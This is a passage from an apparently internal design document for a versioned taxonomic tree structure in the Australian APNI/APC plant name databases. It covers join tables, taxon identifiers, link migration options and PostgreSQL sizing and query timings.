- a specific check against the accepted tree in a shard.\n . check to see if a taxon is the same as another taxon i.e. encloses the same sub taxa via comparison of a taxon identifier.\n\n===== implementation (discussion)\n\nTree searches should be associated with the tree they are on because a tree may be separated from the name and instance\ndata it is pointing at. In the case of the uber trees they may be pointing to multiple shards.\n\nSince trees contain the name and instance id, but not instance data a tree search may bring back a list of names that can\nin turn fetch APNI or APC format data via the existing service API (much like the existing service search).\n\nIf we want to implement a closer coupled database implementation in the search we could link to multiple shard databases\nto get the data. *I prefer the previous solution as it allows fully autonomous trees and lists to exist that just use\nlinked data.* However speed will need to be taken into account when looking at this, which means looking at if the service\nAPIs need improving or the solution is limited to direct database connections.\n\nWe need to carefully consider what is offered in search and how you discover what can be searched... initially of course\nwe are publicly offering only the APC as a cross shard search, and then moving up to NSL including AFD.\n\nTrees that are linked to a shard, e.g. the Vascular APC tree, that have a database relationship to the name and instance\ndata in the shard can take advantage of joins for more complex queries.\n\nCross shard searching in general needs an API approach where an API (which could be just a database connection) is used\nto collect data, then a map\/reduce\/sort approach is used to filter and sort results. The name paths and sort names will\nhelp in collating and sorting results from multiple sources.\n\nSee https:\/\/www.anbg.gov.au\/25jira\/browse\/NSL-2412[NSL-2312]\n\nAfter discussion with Greg Whitbread and following from user feedback and experience the use of the name tree search may\nbe a reflection of the way we use the \"product\" concept and clarification of how the sets of data can be used, and what\nthey should be used for.\n\nAt the moment we try and describe this in the APNI and APC product descriptions.\n\nAPNI\n****\nThe Australian Plant Name Index (APNI) is a tool for the botanical community that deals with plant names and their usage\nin the scientific literature, whether as a current name or synonym. APNI does not recommend any particular taxonomy or\nnomenclature. For a listing of currently accepted scientific names for the Australian vascular flora, please use the\nAustralian Plant Census (APC) link above.\n****\n\nAPC\n****\nThe Australian Plant Census (APC) is a list of the accepted scientific names for the Australian vascular flora, ferns,\ngymnosperms, hornworts and liverworts, both native and introduced, and includes synonyms and misapplications for these\nnames. The APC covers all published scientific plant names used in an Australian context in the taxonomic literature,\nbut excludes taxa known only from cultivation in Australia. The taxonomy and nomenclature adopted for the APC are endorsed\nby the Council of Heads of Australasian Herbaria (CHAH).\n****\n\nAs Greg points out though, we don't limit the search, because people are asking \"within\" questions from APNI. This\nquestion comes about because scientific names intrinsically, but unreliably, describe or imply rank and hierarchy\ninformation, except where they don't.\n\nIt seems to me that we need to explicitly combine the name and taxonomy searches and express clearly what it is the\nuser is asking: for example \"what is in the family Fabaceae according to Maberly\" or \"what is in the family Fabaceae\naccording to APC\" and then we can do useful things like \"compare the family Fabaceae according to Maberly and APC\"\n\nBy combining we can ask questions like \"What is not in APC but is in Maberly\" so long as we can emphasize the context\nof the APNI\/NSL dataset.\n\n=== Change over requirements:\n\n . We must maintain existing links to trees (APC) that have been used prior to this change. This means any links to\n existing nodes must resolve to the same instance data and position in the tree structure. The intrinsic data should not\n change, though extraneous data may be left out (broken links, some RDF identifiers that didn't lead to real data).\n . Editing the tree should work and be possible from the point of change over.\n\n== Concept\n\nThe concept for the new structure is to remove the need for link objects and simply copy the list of tree elements for\neach version of the tree. The Workspace is then a copy of the current tree that is then altered. When the workspace is\nready it is published as the latest version of the tree by making it the current version. A copy of the current version\nis then made to create the new workspace version.\n\nWe track changes in the tree by maintaining a previous link that points to the tree_element in the previous version.\n\nVersions are grouped by a tree_version which is associated with a tree. Tree_elements are associated with a tree_version\nvia a linking tree_version_element table.\n\n Tree <- [Tree_Versions]<-[Tree_Version_Elements]<- [Tree_Elements]\n\nThe tree holds a pointer to the current tree and a default workspace. Tree_version_element is a join table between tree\nversions and tree elements, and is the versioned object or tree_element. This structure reduces duplication of data on\ncopying a tree, and holds a unique versioned identifier for an element in a tree.\n\nThis concept is storage efficient and simple. Excessive numbers of versions could create a lot of copied\ntree version elements, but the workspace\/publish model may also lead to a more structured release of versions\n(e.g. once a Day\/Week\/Month) instead of on the fly changes.\n\n=== User concept\n\nVersions of a tree are Publications that can be referenced or cited. You can cite a published tree (version) using an\nidentifier for the _tree_version_ or using an identifier for a _tree_version_element_. This will return the element and\nthen entire tree in the context of the published tree.\n\n==== taxon identifiers\n\nEach tree_version_element also has associated a _taxon identifier_ which identifies the concept of the taxon in terms of\nthe data including the circumscription of the taxon (i.e. the taxa under this taxon). The taxon identifier can be used to\ncompare taxon between versions, i.e. see if the concept has changed.\n\nThe definition of a taxon for determining if it has changed is:\n\n* A taxon consists of the Name, it's Instance and it's children. Where an Instance defines the usage of the Name in a\nreference and it's Synonymy.\n* A taxon does *not* include the status (Excluded from this classification) or the Profile data (Comments and Distribution)\nwhich are part of the classification as published.\n\nA taxon will exist in many publications (versions) of a tree, so the distribution, comments and status may change over\nthe publications.\n\nNOTE: See <<Existing links, Existing links >> for resolving taxon identifiers\n\n=== Autonomous trees\n\nTrees should be able to be autonomous from the shards. This means that database foreign keys to names and instances are\nnot enforced (i.e. no direct FK relationship). This means we need to rely on the link to identify the instances. It also\nmeans that we want to copy the data required to ask questions of the tree into the tree structure as much as possible.\n\nWhilst we will rely on the link to reference the data in the shards we will store the instance and name id (as a Long),\nwhich means also that we need to store the source shard for the instance and name. If a placed name later becomes\nde-duplicated we may have to update the id by using the mapper (rare).\n\n=== Data usage vs speed\n\nCopying the tree for every version is less space efficient than the current model, but affords many benefits. At the\ncurrent size of the APC tree 35k tree_elements are required for each copy.\n\nNOTE: these are updated usage figures after spiking and importing actual data, the old guesstimate has been removed.\n\nAfter doing the spike and adding in all the additional data to make the trees autonomous we can compare actual data sizes.\nThese have been updated with the version join table instead of simple copies.\n\n\nIn APNI:\n\n|===\n| table | total size including indexes\n\n| tree_node\n| 284MB (inc 224MB index)\n\n| tree_event\n| 1328MB (inc 248kB index)\n\n| tree_link\n| 1434MB (inc 693MB index)\n\n| tree_element (152 versions)\n| 263MB (inc 95MB index)\n\n| tree_version_element (5.5M)\n| 4088MB (inc 2564MB index)\n|===\n\nwhich makes the new tree structure not much larger than the old one.\n\nNote: Prior to implementing the join table for version\/element tree_element table was consuming ~40GB of data for 150\nversions. The totals of table columns didn't add up to this amount, but there was something else the DB was doing to\nuse this space.\n\n==== Tree_Version_element \"link table\"\n\nInstead of copying the tree_elements each lime we just need to keep a link table of elements to tree versions, making\na many to many relationship. This adds a little complexity when archiving off older versions of trees, but at the same\ntime will reduce the need to archive.\n\nThe link table means that tree elements that don't change do not need to be copied. To copy a tree to draft is a matter\nadding the link table rows. New elements only participate in new trees.\n\nThis means we don't need to use a composite key for tree elements, we just use the element_id which can become the id.\n\nThe reason why we didn't initially do this was that the old tree changes the parent node quite often based on something\nelse changing on this or another branch. But... the changing parent doesn't mean something changed above that node, but\nthere *may* have been a placement change.\n\nIf the parent of a node does actually change in some material way we need to insert a new tree_element at the point where\nthe change happens. *This is not easy.*\n\nA simpler compromise for this is to only create a new tree_element when the parent changes. this will still replicate a\nlot of redundant data.\n\nThe diagram below demonstrates the problem. Nodes 5,6,7 have not changed, they have been added so that the tree from 5\ndown shows the addition of node 8. Node 3 is in both trees, it just has two parent links. We just want to have a version\n(say v2) point to 1, 2, 3, 4, 8. Which for two versions we could accomplish (if nothing above 8 changes) by using the previous\nnode link, but for if you look at node 9, 10, 11 it gets trickier to do.\n\nimage::multi-parent-node.svg[]\n\nWhat we need to do is compare the data in the nodes to check the parentage, in particular we need to check the instance\npath of the node. So for each daily version we create a tree based on instance path where we have a unique tree_element\nfor each instance path. We then map the tree_elements to a version.\n\n. for each top node (daily) recurse down the tree creating a table of:\n. [instance path id], instance path, node id, instance id, name id, parent instance path id, version number\n. group by instance_path, aggregate version numbers, aggregate node_ids\n. generate new tree elements for each instance path, using the parent instance path to set the parent tree_element\n. add tree elements to versions\n\n\n==== Finding sizes\n\n[source]\n.table-size.sql\n----\nSELECT\n *,\n pg_size_pretty(total_bytes) AS total,\n pg_size_pretty(index_bytes) AS INDEX,\n pg_size_pretty(toast_bytes) AS toast,\n pg_size_pretty(table_bytes) AS TABLE\nFROM (\n SELECT\n *,\n total_bytes - index_bytes - COALESCE(toast_bytes, 0) AS table_bytes\n FROM (\n SELECT\n c.oid,\n nspname AS table_schema,\n relname AS TABLE_NAME,\n c.reltuples AS row_estimate,\n pg_total_relation_size(c.oid) AS total_bytes,\n pg_indexes_size(c.oid) AS index_bytes,\n pg_total_relation_size(reltoastrelid) AS toast_bytes\n FROM pg_class c\n LEFT JOIN pg_namespace n ON n.oid = c.relnamespace\n WHERE relkind = 'r'\n ) a\n ) a;\n----\n\nNOTE: The new data structure allows us to partition and archive older versions should we need to.\n\nCopying the 35k tree_elements to a workspace takes about 12.8 seconds, *however we only need to add join table\nrows to make a copy* which is much quicker, 850ms.\n\n insert into tree_version_tree_elements (tree_version_id, tree_element_id)\n SELECT 9703722, tree_element_id from tree_version_tree_elements where tree_version_id = 152;\n\n\n===== VM info:\n appsint1 24GB RAM (18GB used) 50GB space with ~27GB free for tomcat\n pgsql-prod1-ibis.it.csiro.au 6GB RAM (5GB used)\n \/dev\/mapper\/vg_data-lv_data 50G 981M 50G 2% \/pg_data\n \/dev\/mapper\/vg_back-lv_back 100G 16G 85G 16% \/pg_back\n \/dev\/mapper\/vg_tbl1-lv_tbl1 100G 8.3G 92G 9% \/pg_tbl1\n \/dev\/mapper\/vg_xlog-lv_xlog 20G 257M 20G 2% \/pg_xlog\n\n=== Multiple workspaces\n\nBecause a workspace is just a copy of a version of the tree with pointers to the previous version of it's tree_elements,\nwe can implement a merge of the latest tree or a version (like a branch in GIT). A workspace or draft version of the tree\nwould reference the version it is a copy of and when you go to publish it, we check that the version of the current\ntree has not changed. If it has you would need to merge the current version of the tree with your draft version. Where\nthere are conflicts, i.e. the current version has changed a tree_element that you have also changed you need to resolve\nthe conflict by either accepting the current version, overwriting the current version with yours, or somehow merging the\nchanges. The workflow for a merge of conflicting changes is the trickiest bit.\n\nWhere different workspaces are working in different branches of the tree auto merging would be possible.\n\nMultiple workspaces would make long running projects more feasible, e.g. adding a branch of orchids as a single update.\n\nTalking to the current APC editors they considered the ability to have multiple workspaces and merging as something that\n\"was always a requirement, really\"\n\n=== Building new trees\n\nA new tree starts with an initial draft version which can be\n\n . a copy of an existing tree\n . entirely new, adding elements to the root of the tree\n . made up of copies of portions of other trees, by copying from a node down and placing that section under a node in\n the draft.\n\nOnce the initial draft is ready to be made \"public\" it is published as the first version.\n\n=== Tree paths\n\nThe current name tree path concept would be incorporated into the new tree_elements to provide a rapid way to display,\nsort, and search for items under (subtending) an element (currently called a node). We can then remove name_tree_path as\nan additional maintenance cost.\n\n=== Immutable\n\nThe immutability of published versions (apart from typographical fixes, mainly in the names\/references) means that we can\nuse de-normalisation of data to increase efficiency in display and queries. For example, storing a precomposed display\nstring for the tree, name and rank information (see name_tree_paths rank path and name path). This also makes trees largely\nstand alone when it comes to queries.\n\n****\nFor example you could search *just the tree elements* for a name string % abru% in family\nFabaceae of rank species that are native to WA.\n****\n\nThis will greatly improve the speed and simplicity of searches, especially given the right indexes.\n\nSince links are also immutable they can also be stored to reduce round trips to the mapper.\n\n=== Synonyms\n\nTo further make trees autonomous we need to store the synonyms of the name in the tree element data. This can be achieved\nby storing a names string, similar to the name path, that contains all the synonyms of the name separated by a pipe.\n\n e.g.\n |Acacia mucronata subsp. mucronata|Acacia mucronata var. linearis|Acacia mucronata var. mucronata|Racosperma mucronatum subsp. mucronatum\n\nThis means you can do a search for a name on a tree including the synonyms by doing:\n\n select * from tree_element where names like '%|Acacia mucronata var. linearis%';\n\nNOTE: after implementing the names string and testing various queries the speed benefit of having the synonyms in this\nformat wasn't there and the use cases need the extra information. So I have removed the names string format and just left\nthe synonyms jsonb data. Greg W pointed out it might be worth splitting synonyms into synonyms and relationships.\nI have replaced that string with a synonyms_html string for displaying the nomenclatural, taxanomic and missapplications.\n\nA jsonb synonyms field stores more synonym data. To do a synonym search on a JSONB field and take advantage of gin\nindexing we need to carefully structure the JSON data around a common search. This probably means grouping the synonyms\ninto relationship types e.g.\n\n[source,javascript]\n.synonyms.json\n----\n{\n \"Isoetes drummondii var. anomala\" : {\n \"mis\" : false,\n \"nom\" : true,\n \"tax\" : false,\n \"type\" : \"nomenclatural synonym\",\n \"cites\" : \"Britton, D.M. & Brunton, D.F.(1991), < i > Fern Gazette < \/i> 14\",\n \"name_id\" : 205871,\n \"full_name_html\": \"<scientific><name id='205871'><scientific><name id='64421'><scientific><name id='64341'><element class='Isoetes'>Isoetes<\/ element > < \/name><\/ scientific > < element class = 'drummondii' > drummondii < \/element><\/ name > < \/scientific> <rank id='54412'>var.<\/ rank > < element class = 'anomala' > anomala < \/element> <authors><ex id='7577' title='Marsden, C.R.'>C.R.Marsden<\/ ex > ex < author id = '5138' title = 'Britton,D.M. & amp; Brunton ,D.F.'>D.M.Britton & D.F.Brunt.<\/author><\/authors><\/name><\/scientific>\"\n },\n \"Isoetes drummondii subsp. nov. (polyploid)\": {\n \"mis\" : false,\n \"nom\" : true,\n \"tax\" : false,\n \"type\" : \"nomenclatural synonym\",\n \"cites\" : \"Ross, J.H.in Ross, J.H.(ed.)(1993), < i > A Census of the Vascular Plants of Victoria < \/i> Edn. 4\",\n \"name_id\" : 205964,\n \"full_name_html\": \"<scientific><name id='205964'><scientific><name id='64421'><scientific><name id='64341'><element class='Isoetes'>Isoetes<\/ element > < \/name><\/ scientific > < element class = 'drummondii' > drummondii < \/element><\/ name > < \/scientific> <rank id='54410'>subsp.<\/ rank > < element class = 'nov. (polyploid)' > nov.(polyploid) < \/element> <authors><author id='7781' title='Ross, J.H.'>J.H.Ross<\/ author > < \/authors><\/ name > < \/scientific>\"\n }\n}\n----\n\n=== Profile data \/ attributes\n\nThe Profile data will be stored as a JSON object\/document field in the tree_element. This allows arbitrary extension of the\nprofile data to be stored. It also provides a consistent versioned view of the Profile data. e.g.\n\n[source,javascript]\n.profile.json\n----\n{\n \"APC Dist.\" : {\n \"value\" : \"Tas\",\n \"source_id\" : 9928,\n \"created_at\" : \"2007-06-06T00:00:00+10:00\",\n \"created_by\" : \"APNI-NSL MIGRATION\",\n \"updated_at\" : \"2007-06-06T00:00:00+10:00\",\n \"updated_by\" : \"APNI-NSL MIGRATION\",\n \"source_system\": \"APC_CONCEPT\"\n },\n \"APC Comment\": {\n \"value\" : \"Previous references to this species on mainland Australia refer to I. muelleri (Chinnock, 1998).\",\n \"source_id\" : 9928,\n \"created_at\" : \"2007-06-06T00:00:00+10:00\",\n \"created_by\" : \"APNI-NSL MIGRATION\",\n \"updated_at\" : \"2007-06-06T00:00:00+10:00\",\n \"updated_by\" : \"APNI-NSL MIGRATION\",\n \"source_system\": \"APC_CONCEPT\"\n }\n}\n----\n\n\n\n==== Comments\n\nComments will be stored as a text comment field in the JSON profile data.\n\n==== Distribution\n\nDistribution data is currently just unstructured and unvalidated text. However a *lot* of the requests for information\nrely on the distribution data, and the correct interpretation of that data. Since distribution data is part of the\nprofile data requirement now is a good time to tackle this.\n\nTo this end we will make the distribution profile data a JSON object in the profile field containing pointers to\ndistribution data combinations. Distribution data combinations consist of a region and a set of flags in a legal\ncombination much the same way as name_status is set up. We use a JSON field because there is a variable number of regions\nthat can be assigned to a concept (tree_element) and we don't want to make outward pointing join tables to tree_elements.\n\nThis design helps keep trees stand alone, while linking back to distribution combinations and allowing the distribution\ndefinition to be extended, while providing the editor with a configurable set of valid profile combinations.\n\nThe Distribution field of the profile will contain a list of JSON object representations of the distribution combinations\nincluding the id of the combination for update purposes.\n\n=== Archiving\n\nThe data structure allows for archiving of versions by moving\/exporting a tree version. The structure keeps all the data\ncontained in the tree itself. Versions are immutable or read only, and self contained. Operations that need to interact\nwith the tree are limited to the workspaces\/drafts, and perhaps some advanced search operations on the current version.\n\nBy storing the Name, display string, Rank Path, and links on the tree, older versions can be displayed and queried without\nreferring to the rest of the NSL database, making it possible to have a service which can display the tree as it was from\narchived version in a different database.\n\nThis also means exporting a tree version provides 'all' the data needed to describe the tree.\n\n=== [.line-through]#Composite keys for tree_elements#\n\n\nNOTE: We have moved to a join table for the elements to tree versions so we don't need a composite key. A join table\ndoesn't reduce the advantages except for the identification of nodes to tree elements due to needing a unique tree_element\nid that is not related to node id.\n\nIt would be worth looking at using composite keys for tree_elements made up of the tree_version id and the tree_element id\nthat way we can copy the tree_elements and just change the version number.\n\nThe advantages of this are:\n\n . dramatically reduces the number of id's we have to generate out of the globally unique ID pool\n . intrinsically tracks nodes from one version to the next\n . simplifies the copy process a little\n . may help in diffing trees ( grab all the tree_elements with the same id across versions )\n . lets you very quickly find what an old version of a tree_element looks like now and ask questions like is this in\n the current version without any tree walks.\n\nDisadvantages are:\n\n . Looking up by id always requires the version\n . slightly trickier ORM mapping\n\nI think just advantage 1 outweighs the disadvantages because 100 x 35000 = 3,500,000 new IDs per year when the majority of\nthe data doesn't change. The rest of the advantages come down to speed and efficiency.\n\n=== Auditing\n\nA single updated by and updated at field is required in the tree_element since changes are versioned.\n\n== Transition\n\nWe will identify and replace the existing service endpoints for the Instance Editor to maintain functionality with the\nchange over. The tree editor functionality will need to be changed or incorporated into the Instance Editor. This work\nneeds to happen anyway.\n\n=== Existing history\n\nThere are currently:\n\n * 114k current APC nodes, including 35k taxon nodes and 79k value nodes.\n * 365k taxon nodes for any tree (including the APNI name tree)\n * 7M links.\n * 2995 versioned changes to the APC tree\n\nThe version changes date back to 2012-02-09 via the APC import. Greg Whitbread has suggested that we could discard all the\nhistorical changes up to a point, and considering no one would have relevant links that are currently supported.\n\nLooking in the mapper we only have mapped these older URI:\n\n * apni.name\/\n * apni.publication\/\n * apni.reference\/\n * apni.taxon\/\n\nNone of which refer to tree information, or nodes.\n\nWe currently map 63k node objects in the mapper across all trees, 48k nodes in apni (vascular shard).\n\nThere are 315k taxon nodes out of 365k (apni shard) that are _not_ in the mapper and therefore have never been referenced.\nThere are 67k APC taxon nodes out of 115k APC taxon nodes that are _not_ in the mapper and so haven't been referenced.\nThere are only 5 nodes in the current APC tree that are not in the mapper.\n\nHow much history should we keep? We can import from 2016 and delete history later.\n\n=== option 1\n\nBased on the above stats we should be able to work out which of the 2995 versions of the tree we have currently are in\nthe mapper and and just replicate those versions to maintain the mapped links. Doable, but tricky.\n\n*NOTE* it's possible that we have shared links to nodes that are _not_ in the mapper via the APC taxon exports. These\nlinks are created in SQL, but may not have been created in the mapper because no one has referred to them via the services.\nWe could fix this by adding all nodes since the APC taxon exports started being used (with node links). There are 5 nodes\nin the current APC tree that are not in the mapper.\n\n=== option 2\n\nDraw a line in the sand, then group changes. We can be sure that no links to the tree exist before the NSL was launched,\nso we can ignore all versions before January 2015 (leaving us with 2643 versions). Then group versions into monthly\nreleases and point all node links in that month to the final version of the node for that month. This brings it down to\naround 30 versions.\n\nThis somewhat breaks the contract that what was cited is what we get back, however the number of citations where the\nchanges incurred matter would, I guess, be approaching zero? I say that because by and large the changes per version are\nfor a single item, so while december 2015 saw 132 versions each one was for a single name, e.g.\n\n.version changes\n|===\n|note |time stamp\n\n|update name 5416769|2015-12-23 09:34:44.212000 +11:00\n|update name 81345|2015-12-23 09:33:52.836000 +11:00\n|update name 5417736|2015-12-23 09:32:46.223000 +11:00\n|update name 5419222|2015-12-23 09:31:40.348000 +11:00\n|update name 80372|2015-12-23 09:29:25.683000 +11:00\n|add name 80912 to name 80855|2015-12-23 08:49:16.608000 +11:00\n|add name 80899 to name 80855|2015-12-23 08:48:29.840000 +11:00\n|add name 80878 to name 80855|2015-12-23 08:47:15.710000 +11:00\n|===\n\nTake these changes adding excluded names to Correa pulchella J.B.Mackay ex Sweet which is this node\nhttps:\/\/biodiversity.org.au\/nsl\/services\/node\/apni\/5424450 at 2015-12-23 08:49:16.608000 +11:00 but was a different\nnode 3 minutes earlier. The reality is that these changes were meant to be done as a batch and should only have been\npublished once.\n\n==== option 2a\n\nWe could modify this option to group changes in a day to a single version, in which case I doubt anyone would notice.\nThis would not dramatically increase the number of versions saved as tree work seems to be limited to a few days a month\nwhich comes out as a total of 206 versions from 2015-01-01.\n\n=== Declared BTs\n\nDeclared BT tree_elements will be removed from history and where we can the excluded names attached to the BT will\nbe linked ot the BTs parent directly. Most of the time this will mean the top of the tree. This will create a consistent\ntree in the history.\n\n=== Existing links\n\nNOTE: A link to a node in the old structure only gives you the structure *below* it as it was when you took the link\nunless you took a link to a changed node further up the tree, or the top node. Although it is possible to find the\nversion of the tree you were looking at it was *not* intrinsic in the link. The node identifier is effectively a taxon\nconcept identifier.\n\nWe can take existing published links and forward them to new links. Due to history only being maintained in node links\nbelow that node we need node links to point to the latest version that has that node id.\n\nWith the change to using a join table we lose the node_id\/tree_element relationship, so we either need to store the\nnode id(s) in the tree_element or just use the mapper to map to the tree_element.\n\nThe most appropriate solution is to use the mapper to map node URI to tree_elements. They will resolve more appropriately\nto a _taxon identifier_.\n\n==== new links\n\nWe need to be able to encode the version into the tree links since tree_element uses a composite key.\n\nLinks currently are structured as ...\/object\/namespace\/number, e.g. node\/apni\/7845073, where the namespace so far\nhas been directly related to the shard. Trees are meant to be above\/separate to shards, so perhaps we should move to\nstoring the shard specifically in the identity structure in the mapper (it's more of a system identifier). This way\nwe can use the namespace as intended and have tree element links like:\n\n ...\/tree\/137\/7845073 i.e. effectively tree\/version\/element\n\nWARNING: The ID of tree_element should be _GLOBALLY UNIQUE_ so it *can* be copied from one tree to another on different\nsystems.\n\nthis lets us map any tree version to any shard\/uber service directly.\n\nThe mapper configuration handles the namespace to system mapping.\n\nThis URL scheme is useful for debugging.\n\nNOTE: Previously links were only created in the mapper when they were requested by the services - This was not intended\n to be the default way to make links, but... So when a workspace is created we do a bulk add of identifiers to\n the mapper. We need to add a bulk add api call on the mapper (done).\n\nThe mapper currently handles around 1.15 million identities without problem, and is designed to scale out via load\nbalancing if needed.\n\nNOTE: tree_elements store links to instance and name. The tree_version_element holds the \"element link\" to itself. The\nelement link is the primary key of the tree_version_element join table.\n\n==== taxon identifiers\n\nSince taxon identifiers exist in multiple versions of different trees (since they represent the taxon concept regardless\nof version) the question becomes how do you resolve a taxon concept? In the sense of this document it becomes clear that\na taxon concept is a fixed representation of the branch below a taxon, and the data contained within the circumscribed\ntaxa. So a taxon concept is fixed or immutable and exists outside of versions (so it may not be the current concept used)\nwhich means we can choose the concept from any version (by definition they are the same).\n\nWARNING: There are significant questions regarding use of taxon ID. Ideally the instance ID *is* the taxon ID\nbut the child taxa are not defined within an instance, they are described on a tree. If you change the sub taxa\nthe instance should change, but if you just haven't fully described the concept represented by the instance then the\ntaxon is the same. A taxon ID as described here represents what has been described in this tree so far, not what the\nconcept represents.\n\n.*_CONCLUSION_*\n\n****\nI have decided for the purposes of getting a working tree that is manageable that we should *not* track and create\ntaxon IDs as such. We can provide a comparison service end point (even a database function) to compare taxa in trees\nat a point. The user can compare Instance IDs as the definition of a Concept of a taxon, then compare two trees\nrepresentation of that taxon and all it's sub taxa. Just because the representation in a tree is slightly different\nthe taxon they are *trying* to represent may be the same, they just made a mistake or haven't completed the task.\n\nIt can be left as a later excercise to create services that track taxa and validate their use, i.e. if someone re-uses\nan instance in another tree, does it contain *only* the same taxa in the same order?\n****\n\n===== A circumscription hash\n\nSo we could resolve a taxon using something like:\n\nhttp:\/\/id.biodiversity.org.au\/taxon\/80dd7fffd995817fe1a4d4494c519a0c1aa38803b394f69482ab5c794318e0a9\n\nTo generate the hash taxon identifier we use the [.line-through]#tree paths# instance paths of the parent and the\nchildren within that version:\n\nNOTE: We changed from the tree path to the instance path above because the tree element id changes on editing and it\nbecomes very tricky to track taxon changes, or element changes that have no net effect, e.g. moving a taxon to another\nfamily and then moving it back. By using the instance id path we can use the query below to check if a taxon has changed\nbecause the instance should not have changed.\n\n[source]\n.circumscribe.sql\n----\nCREATE EXTENSION pgcrypto;\n\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS TEXT\nLANGUAGE SQL\nAS\n$$\nSELECT sha256_agg(paths)\nFROM (\n SELECT e.instance_path AS paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.instance_path LIKE path_match || '%'\n ORDER BY e.tree_path\n ) AS circumscription;\n$$;\n----\nsee <<A simple sha256_agg function>>\n\nThe circumscribe function above is a unique hash of all the children in order under a taxon (including that taxon). The\ncurrent worst case time for calculation of Plantae is ~2 seconds when placing a new leaf taxon we need to take the\ntree path of that taxon and re calculate the taxon identifier hash for all the tree_version_elements in that path. Given\nabout 11 levels those calculations should take less than 22 seconds, and could be updated in the background.\n\nWe can drop the hash and use a simple array of instance ids for comparisons e.g.\n\n[source]\n.circumscribe.sql\n----\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS BIGINT[]\nLANGUAGE SQL\nAS\n$$\nSELECT array_agg(paths)\nFROM (\n SELECT e.instance_id paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.instance_path LIKE path_match || '%'\n ORDER BY e.instance_path\n) AS circumscription;\n$$;\n----\n\nThe difference in speed is around 300ms which would be significant in bulk operations, and this provides real\ndata that can be used (instance ids).\n\n===== More efficient method\n\nAll tree_elements have a hash of the tree_path. The tree_path (and tree_element as a result) guarantees that the path\nabove matches the taxon, so we only need to include the children to show difference. We also only need the leaf taxon in\nthe hash, because they contain the path of the entire branch to the top of the tree.\n\n. Leaf tree_version_elements use the hash from the tree_element as taxon hash.\n. Parent tree_version_elements concatenate immediate child taxon hashes and hash that.\n. up one level and repeat.\n\nWhen we add a taxon (leaf) we use the tree_elements hash as the new taxon hash then follow the tree path up regenerating\nthe taxon hash for each tree_version_element up the tree as above.\n\nThis method would be more efficient in production, but the initial generation is trickier with a reverse tree walk.\n\n==== Even more efficient and pragmatic method\n\nThe Hash methods have an elephant in the room, Hashes. A Hash can clash, they're good for cases where the data doesn't\nexceed the number of different hashes. Sha256 has a lot of hashes and can represent billions of separate bits of data\nbut we can't guarantee there won't be a clash. The best way to use a hash is to reduce the length of the data\nrepresented by the hash. We can determine the uniqueness of a taxon (the circumscription of children and the taxon itself)\nusing the sum of the tree_paths of the leaf tree_elements. This effectively represents the tree, in fact it's just printing\nout the tree id's in order (depth first) as a string. The above hash methods take that string and hash it. The string\ncontains a lot of repetition, but it is unique to this taxon... it *is* this taxon.\n\nAt last count we have 5.4 million tree_version_elements, 38 thousand tree_elements, and by the look of it around 40k\nindividual taxon. *It would be simpler to just assign an ID to a new taxon.* In fact, we already use the node ID to\nidentify the taxon, so we can just keep them as taxon identifiers and generate new ones when we add a taxon:\n\n. Add (or Remove) a leaf element and assign the tree_version_element a new taxon ID\n. use the tree_path to assign new taxon IDs to all the tree_version_elements up the branch\n. profit.\n\n===== cons?\n\nIf we do this every time a taxon is added to the tree in a draft we will go through a lot of identifiers. We could check\nto see if the identifier is new to this version and only change it once per version, but that is probably unnecessary\noverhead...\n\nLets' say we add 100 taxa in this version at forma level (about 10 levels down from Plantae) all under the same species,\nthen we'll use 1100 identifiers for 110 new taxa.\n\nNOTE: implementation includes a uniqueness check on taxon identifiers when assigning them within a draft version. This\ndoes a count on tree_version_elements with the taxon identifier, if it returns just 1 then this is the only usage and is\na draft so it can be kept as the taxon identifier as it hasn't been published.\n\nIt doesn't intrinsically tell us if two taxa on different trees are the same. If you copy a taxa from one tree to another\nwe could use the same identifier, but if you create a copy of a taxa from parts, you would have a new identifier. We can\nprovide a service to compare taxa, but finding matching taxa across different trees would be relatively expensive (you\ncould use a tree comparison\/diff to identify matches). Once you know two taxons are the same with different IDs you then\nneed to combine the identifiers somehow, perhaps in a matching service.\n\nNOTE: We have added instance path to tree_elements to help us track\/compare taxon. This is because the above method means\na new taxon identifier will be generated when you move a taxon somewhere else then move it back to where it was. There\nis no way to check that it's actually the same taxon. So we can use <<A circumscription hash>> on instance_path.\n\n=== RDF\n\nWe will need to map the new tree structure in joseki. There is a project called nsl-data, that is in the old git\nrepository. The nsl-data\/src\/apni.ttl file contains around 400 lines of mapping config (lines 2057 - 2457) which will\nneed to be reconfigured and deployed.\n\nCurrently the RDF services are apparently largely unused, so we should be able to re-map to a structure that makes\nsense.\n\n=== Uber trees\n\nThe new structure caters for uber trees by easily allowing trees to be copied and providing very fast mechanisms for\nsearch and display. Two million records is certainly not excessive to copy or refer to. It is not expected that people\nwill edit the uber tree directly so workspace versions would not normally be required.\n\nWe need to provide a mechanism to describe and build an uber tree that potentially watches the component trees to build\ncurrent uber tree.\n\nTwo million record tree would be expected to take up around 285MB based on the estimated data usage figures quoted above\nfor 35k names.\n\ndoing a select on 4 819 443 tree_elements and ordering by name_path on my local machine took 3m 12s\n\n select * from tree_element order by name_path;\n 2000 rows retrieved starting from 1 in 3m 12s 448ms (execution: 3m 11s 788ms, fetching: 660ms)\n\nafter optimising postgresql this came down to 1m 40s.\n\nWith a trigram index on name_path a search for everything under Eucalyptus on 4.8M tree_elements (159213 results 2000 fetched)\ntakes ~5 seconds.\n\n sql> select * from tree_element where name_path like '%\/Eucalyptus\/%' order by name_path\n [2017-06-26 17:02:47] 2000 rows retrieved starting from 1 in 4s 910ms (execution: 4s 579ms, fetching: 331ms)\n\nOn about 2M elements it takes 2.2s indicating the time taken for these queries is linear with number of records.\n\n sql> select * from tree_element where tree_version_id > 80 and name_path like '%\/Eucalyptus\/%' order by name_path\n [2017-06-26 17:07:46] 2000 rows retrieved starting from 1 in 2s 271ms (execution: 2s 35ms, fetching: 236ms)\n\nThis also indicates more machine grunt may improve performance. (After optimising postgresql this came down to 1.48s)\n\n****\nMy local machine is an i7-4820K 3.70GHz CPU x 4, 32GB machine with a 500GB Samsung SSD. Postgresql had not 